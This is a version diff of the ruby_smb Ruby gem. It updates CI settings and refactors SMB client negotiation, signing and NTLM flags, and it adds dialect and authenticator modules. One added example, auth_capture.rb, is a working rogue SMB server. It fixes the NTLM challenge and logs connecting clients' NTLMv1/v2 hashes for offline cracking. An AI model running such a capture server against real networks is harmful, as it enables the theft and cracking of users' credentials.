ruby_smb 2.0.8 → 2.0.12

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: e3cfb7914736c49c84c366382e133ea0c2e9a5ecb6f0a3badceb498652bbaa76
-  data.tar.gz: 6f47a0ad156545a259d0496f9e1c59d50b6327889600b6acda0e93ec5c835963
+  metadata.gz: e390e96aa471e87e6406cf5b7eae77a4c45f882201f4132d3243eb25506554dc
+  data.tar.gz: 65620d67c3dbfbf2d3f795856c8da03207a8df32aa439a6f6a0b5d46b385dd31
 SHA512:
-  metadata.gz: 90c181090093eeb71d4ef508a2b1e7b75ccb31b7e40cdee973397f7554af1085e8b39a518f43e9e4e3eba5fd12d0677d1f059ed614eab8dfb5b0db74a956236a
-  data.tar.gz: 443e97e78383d44deb155c0d6e3ca8bc3923c49b2561fa41670e09d7916cdfaa7223143a29b24697699e7470cdcaf6f71a2e0e4167d8c19a7b80b2fc56b2a555
+  metadata.gz: 0c252450305e217779de4c1bf6850fa55f12c95d6380795f6940c0451d33c64f1287ab13f6a373d1dcaa1752d399dac04fd0e358a49000335deba27d46ab8fc7
+  data.tar.gz: 2734dd65b1a84a03fdd914a6877640107caf6bcf561f3a41b769ef947e21276bc8759859ac4a36ba0b2ccfe15778ff06c234ff41dabf9ea4563a74a95ea1b891

data/.github/workflows/verify.yml

@@ -10,7 +10,7 @@ on:
 
 jobs:
   test:
-    runs-on: ubuntu-16.04
+    runs-on: ubuntu-18.04
     timeout-minutes: 40
 
     strategy:
@@ -20,6 +20,7 @@ jobs:
           - 2.5
           - 2.6
           - 2.7
+          - 3.0
         test_cmd:
           - bundle exec rspec
 
@@ -31,23 +32,12 @@ jobs:
       - name: Checkout code
         uses: actions/checkout@v2
 
-      - uses: actions/setup-ruby@v1
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
         with:
           ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
 
-      - name: Setup bundler
-        run: |
-          gem install bundler
-      - uses: actions/cache@v2
-        with:
-          path: vendor/bundle
-          key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
-          restore-keys: |
-            ${{ runner.os }}-gems-
-      - name: Bundle install
-        run: |
-          bundle config path vendor/bundle
-          bundle install --jobs 4 --retry 3
       - name: ${{ matrix.test_cmd }}
         run: |
           echo "${CMD}"

data/examples/auth_capture.rb

@@ -0,0 +1,71 @@
+#!/usr/bin/ruby
+
+require 'bundler/setup'
+require 'ruby_smb'
+require 'ruby_smb/gss/provider/ntlm'
+
+# we just need *a* default encoding to handle the strings from the NTLM messages
+Encoding.default_internal = 'UTF-8' if Encoding.default_internal.nil?
+
+def bin_to_hex(s)
+  s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+end
+
+# this is a custom NTLM provider that will log the challenge and responses for offline cracking action!
+class HaxorNTLMProvider < RubySMB::Gss::Provider::NTLM
+  class Authenticator < RubySMB::Gss::Provider::NTLM::Authenticator
+    # override the NTLM type 3 process method to extract all of the valuable information
+    def process_ntlm_type3(type3_msg)
+      username = "#{type3_msg.domain.encode}\\#{type3_msg.user.encode}"
+      _, client = ::Socket::unpack_sockaddr_in(@server_client.getpeername)
+
+      hash_type = nil
+      hash = "#{type3_msg.user.encode}::#{type3_msg.domain.encode}"
+
+      case type3_msg.ntlm_version
+      when :ntlmv1
+        hash_type = 'NTLMv1-SSP'
+        hash << ":#{bin_to_hex(type3_msg.lm_response)}"
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response)}"
+        hash << ":#{bin_to_hex(@server_challenge)}"
+      when :ntlmv2
+        hash_type = 'NTLMv2-SSP'
+        hash << ":#{bin_to_hex(@server_challenge)}"
+        # NTLMv2 responses consist of the proof string whose calculation also includes the additional response fields
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response[0...16])}"  # proof string
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response[16.. -1])}" # additional response fields
+      end
+
+      unless hash_type.nil?
+        version = @server_client.metadialect.version_name
+        puts "[#{version}] #{hash_type} Client   : #{client}"
+        puts "[#{version}] #{hash_type} Username : #{username}"
+        puts "[#{version}] #{hash_type} Hash     : #{hash}"
+      end
+
+      WindowsError::NTStatus::STATUS_ACCESS_DENIED
+    end
+  end
+
+  def new_authenticator(server_client)
+    # build and return an instance that can process and track stateful information for a particular connection but
+    # that's backed by this particular provider
+    Authenticator.new(self, server_client)
+  end
+
+  # we're overriding the default challenge generation routine here as opposed to leaving it random (the default)
+  def generate_server_challenge(&block)
+    "\x11\x22\x33\x44\x55\x66\x77\x88"
+  end
+end
+
+# define a new server with the custom authentication provider
+server = RubySMB::Server.new(
+  gss_provider: HaxorNTLMProvider.new
+)
+puts "server is running"
+server.run do
+  puts "received connection"
+  # accept all of the connections and run forever
+  true
+end

data/lib/ruby_smb/client/negotiation.rb

@@ -57,15 +57,20 @@ module RubySMB
 
       # Takes the raw response data from the server and tries
       # parse it into a valid Response packet object.
-      # This method currently assumes that all SMB1 will use Extended Security.
       #
       # @param raw_data [String] the raw binary response from the server
       # @return [RubySMB::SMB1::Packet::NegotiateResponseExtended] when the response is an SMB1 Extended Security Negotiate Response Packet
+      # @return [RubySMB::SMB1::Packet::NegotiateResponse] when the response is an SMB1 Negotiate Response Packet
       # @return [RubySMB::SMB2::Packet::NegotiateResponse] when the response is an SMB2 Negotiate Response Packet
       def negotiate_response(raw_data)
         response = nil
         if smb1
           packet = RubySMB::SMB1::Packet::NegotiateResponseExtended.read raw_data
+
+          unless packet.valid?
+            packet = RubySMB::SMB1::Packet::NegotiateResponse.read raw_data
+          end
+
           response = packet if packet.valid?
         end
         if (smb2 || smb3) && response.nil?
@@ -74,17 +79,10 @@ module RubySMB
         end
         if response.nil?
           if packet.packet_smb_version == 'SMB1'
-            extended_security = if packet.is_a? RubySMB::SMB1::Packet::NegotiateResponseExtended
-              packet.parameter_block.capabilities.extended_security
-            else
-              "n/a"
-            end
             raise RubySMB::Error::InvalidPacket.new(
               expected_proto:  RubySMB::SMB1::SMB_PROTOCOL_ID,
-              expected_cmd:    RubySMB::SMB1::Packet::NegotiateResponseExtended::COMMAND,
-              expected_custom: "extended_security=1",
-              packet:          packet,
-              received_custom: "extended_security=#{extended_security}"
+              expected_cmd:    RubySMB::SMB1::Packet::NegotiateResponse::COMMAND,
+              packet:          packet
             )
           elsif packet.packet_smb_version == 'SMB2'
             raise RubySMB::Error::InvalidPacket.new(
@@ -123,7 +121,7 @@ module RubySMB
           'SMB1'
         when RubySMB::SMB2::Packet::NegotiateResponse
           self.smb1 = false
-          unless packet.dialect_revision.to_i == 0x02ff
+          unless packet.dialect_revision.to_i == RubySMB::SMB2::SMB2_WILDCARD_REVISION
             self.smb2 = packet.dialect_revision.to_i >= 0x0200 && packet.dialect_revision.to_i < 0x0300
             self.smb3 = packet.dialect_revision.to_i >= 0x0300 && packet.dialect_revision.to_i < 0x0400
           end

data/lib/ruby_smb/client.rb

@@ -2,18 +2,19 @@ module RubySMB
   # Represents an SMB client capable of talking to SMB1 or SMB2 servers and handling
   # all end-user client functionality.
   class Client
+    require 'ruby_smb/ntlm'
+    require 'ruby_smb/signing'
     require 'ruby_smb/client/negotiation'
     require 'ruby_smb/client/authentication'
-    require 'ruby_smb/client/signing'
     require 'ruby_smb/client/tree_connect'
     require 'ruby_smb/client/echo'
     require 'ruby_smb/client/utils'
     require 'ruby_smb/client/winreg'
     require 'ruby_smb/client/encryption'
 
+    include RubySMB::Signing
     include RubySMB::Client::Negotiation
     include RubySMB::Client::Authentication
-    include RubySMB::Client::Signing
     include RubySMB::Client::TreeConnect
     include RubySMB::Client::Echo
     include RubySMB::Client::Utils
@@ -277,7 +278,8 @@ module RubySMB
     # @param smb1 [Boolean] whether or not to enable SMB1 support
     # @param smb2 [Boolean] whether or not to enable SMB2 support
     # @param smb3 [Boolean] whether or not to enable SMB3 support
-    def initialize(dispatcher, smb1: true, smb2: true, smb3: true, username:, password:, domain: '.', local_workstation: 'WORKSTATION', always_encrypt: true)
+    def initialize(dispatcher, smb1: true, smb2: true, smb3: true, username:, password:, domain: '.',
+                   local_workstation: 'WORKSTATION', always_encrypt: true, ntlm_flags: default_flags)
       raise ArgumentError, 'No Dispatcher provided' unless dispatcher.is_a? RubySMB::Dispatcher::Base
       if smb1 == false && smb2 == false && smb3 == false
         raise ArgumentError, 'You must enable at least one Protocol'
@@ -306,18 +308,12 @@ module RubySMB
       # SMB 3.x options
       @session_encrypt_data = always_encrypt
 
-      negotiate_version_flag = 0x02000000
-      flags = Net::NTLM::Client::DEFAULT_FLAGS |
-        Net::NTLM::FLAGS[:TARGET_INFO] |
-        negotiate_version_flag ^
-        Net::NTLM::FLAGS[:OEM]
-
       @ntlm_client = Net::NTLM::Client.new(
         @username,
         @password,
         workstation: @local_workstation,
         domain: @domain,
-        flags: flags
+        flags: ntlm_flags
       )
 
       @tree_connects = []
@@ -368,31 +364,28 @@ module RubySMB
 
     # Performs protocol negotiation and session setup. It defaults to using
     # the credentials supplied during initialization, but can take a new set of credentials if needed.
-    def login(username: self.username, password: self.password, domain: self.domain, local_workstation: self.local_workstation)
+    def login(username: self.username, password: self.password,
+              domain: self.domain, local_workstation: self.local_workstation,
+              ntlm_flags: default_flags)
       negotiate
-      session_setup(username, password, domain, true,
-                    local_workstation: local_workstation)
+      session_setup(username, password, domain,
+                    local_workstation: local_workstation,
+                    ntlm_flags: ntlm_flags)
     end
 
     def session_setup(user, pass, domain, do_recv=true,
-                      local_workstation: self.local_workstation)
+                      local_workstation: self.local_workstation, ntlm_flags: default_flags)
       @domain            = domain
       @local_workstation = local_workstation
       @password          = pass.encode('utf-8') || ''.encode('utf-8')
       @username          = user.encode('utf-8') || ''.encode('utf-8')
 
-      negotiate_version_flag = 0x02000000
-      flags = Net::NTLM::Client::DEFAULT_FLAGS |
-        Net::NTLM::FLAGS[:TARGET_INFO] |
-        negotiate_version_flag ^
-        Net::NTLM::FLAGS[:OEM]
-
       @ntlm_client = Net::NTLM::Client.new(
           @username,
           @password,
           workstation: @local_workstation,
           domain: @domain,
-          flags: flags
+          flags: ntlm_flags
       )
 
       authenticate
@@ -444,14 +437,14 @@ module RubySMB
       when 'SMB1'
         packet.smb_header.uid = self.user_id if self.user_id
         packet.smb_header.pid_low = self.pid if self.pid
-        packet = smb1_sign(packet)
+        packet = smb1_sign(packet) if signing_required && !session_key.empty?
       when 'SMB2'
         packet = increment_smb_message_id(packet)
         packet.smb2_header.session_id = session_id
-        unless packet.is_a?(RubySMB::SMB2::Packet::SessionSetupRequest)
-          if self.smb2
+        unless packet.is_a?(RubySMB::SMB2::Packet::SessionSetupRequest) || session_key.empty?
+          if self.smb2 && signing_required
             packet = smb2_sign(packet)
-          elsif self.smb3
+          elsif self.smb3 && (signing_required || packet.is_a?(RubySMB::SMB2::Packet::TreeConnectRequest))
             packet = smb3_sign(packet)
           end
         end
@@ -654,5 +647,17 @@ module RubySMB
         @preauth_integrity_hash_value + data.to_binary_s
       )
     end
+
+    private
+
+    def default_flags
+      negotiate_version_flag = 0x02000000
+      flags = Net::NTLM::Client::DEFAULT_FLAGS |
+        RubySMB::NTLM::NEGOTIATE_FLAGS[:TARGET_INFO] |
+        negotiate_version_flag ^
+        RubySMB::NTLM::NEGOTIATE_FLAGS[:OEM]
+
+      flags
+    end
   end
 end

data/lib/ruby_smb/dialect.rb

@@ -0,0 +1,45 @@
+module RubySMB
+  # Definitions that define metadata around a particular SMB dialect. This is useful for grouping dialects into a
+  # hierarchy as well as printing them as human readable strings with varying degrees of specificity.
+  module Dialect
+    # the order (taxonomic ranking) of the family, 2 and 3 are intentionally combined
+    ORDER_SMB1 = 'SMB1'.freeze
+    ORDER_SMB2 = 'SMB2'.freeze
+
+    # the family of the dialect
+    FAMILY_SMB1 = 'SMB 1'.freeze
+    FAMILY_SMB2 = 'SMB 2.x'.freeze
+    FAMILY_SMB3 = 'SMB 3.x'.freeze
+
+    # the major version of the dialect
+    VERSION_SMB1 = 'SMB v1'.freeze
+    VERSION_SMB2 = 'SMB v2'.freeze
+    VERSION_SMB3 = 'SMB v3'.freeze
+
+    # the names are meant to be human readable and may change in the future, use the #dialect, #order and #family
+    # attributes for any programmatic comparisons
+    Definition = Struct.new(:dialect, :order, :family, :version_name, :full_name) do
+      alias_method :short_name, :version_name
+    end
+
+    ALL = [
+      Definition.new('NT LM 0.12', ORDER_SMB1, FAMILY_SMB1, VERSION_SMB1, 'SMB v1 (NT LM 0.12)'.freeze),
+      Definition.new('0x0202',     ORDER_SMB2, FAMILY_SMB2, VERSION_SMB2, 'SMB v2.0.2'.freeze),
+      Definition.new('0x0210',     ORDER_SMB2, FAMILY_SMB2, VERSION_SMB2, 'SMB v2.1'.freeze),
+      Definition.new('0x02ff',     ORDER_SMB2, FAMILY_SMB2, VERSION_SMB2, 'SMB 2.???'.freeze), # wildcard revision
+      Definition.new('0x0300',     ORDER_SMB2, FAMILY_SMB3, VERSION_SMB3, 'SMB v3.0'.freeze),
+      Definition.new('0x0302',     ORDER_SMB2, FAMILY_SMB3, VERSION_SMB3, 'SMB v3.0.2'.freeze),
+      Definition.new('0x0311',     ORDER_SMB2, FAMILY_SMB3, VERSION_SMB3, 'SMB v3.1.1'.freeze)
+    ].map { |definition| [definition.dialect, definition] }.to_h
+
+    #
+    # Retrieve a dialect definition. The definition contains metadata describing the particular dialect.
+    #
+    # @param [Integer, String] dialect the dialect to retrieve the definition for
+    # @return [Definition, nil] the definition if it was found
+    def self.[](dialect)
+      dialect = '0x%04x' % dialect if dialect.is_a? Integer
+      ALL[dialect]
+    end
+  end
+end

data/lib/ruby_smb/dispatcher/base.rb

@@ -9,7 +9,7 @@ module RubySMB
       def nbss(packet)
         nbss = RubySMB::Nbss::SessionHeader.new
         nbss.session_packet_type = RubySMB::Nbss::SESSION_MESSAGE
-        nbss.stream_protocol_length = packet.do_num_bytes
+        nbss.stream_protocol_length = packet.do_num_bytes.to_i
         nbss.to_binary_s
       end
 

data/lib/ruby_smb/gss/provider/authenticator.rb

@@ -0,0 +1,42 @@
+module RubySMB
+  module Gss
+    module Provider
+      module Authenticator
+        #
+        # The base class for a GSS provider's unique authenticator. This provides a common interface and is not usable
+        # on it's own. The provider-specific authentication logic is defined within this authenticator class which
+        # actually runs the authentication routine.
+        #
+        class Base
+          # @param [Provider::Base] provider the GSS provider that this instance is an authenticator for
+          # @param server_client the client instance that this will be an authenticator for
+          def initialize(provider, server_client)
+            @provider = provider
+            @server_client = server_client
+            @session_key = nil
+            reset!
+          end
+
+          #
+          # Process a GSS authentication buffer. If no buffer is specified, the request is assumed to be the first in
+          # the negotiation sequence.
+          #
+          # @param [String, nil] buffer the request GSS request buffer that should be processed
+          # @return [Gss::Provider::Result] the result of the processed GSS request
+          def process(request_buffer=nil)
+            raise NotImplementedError
+          end
+
+          #
+          # Reset the authenticator's state, wiping anything related to a partial or complete authentication process.
+          #
+          def reset!
+            @session_key = nil
+          end
+
+          attr_accessor :session_key
+        end
+      end
+    end
+  end
+end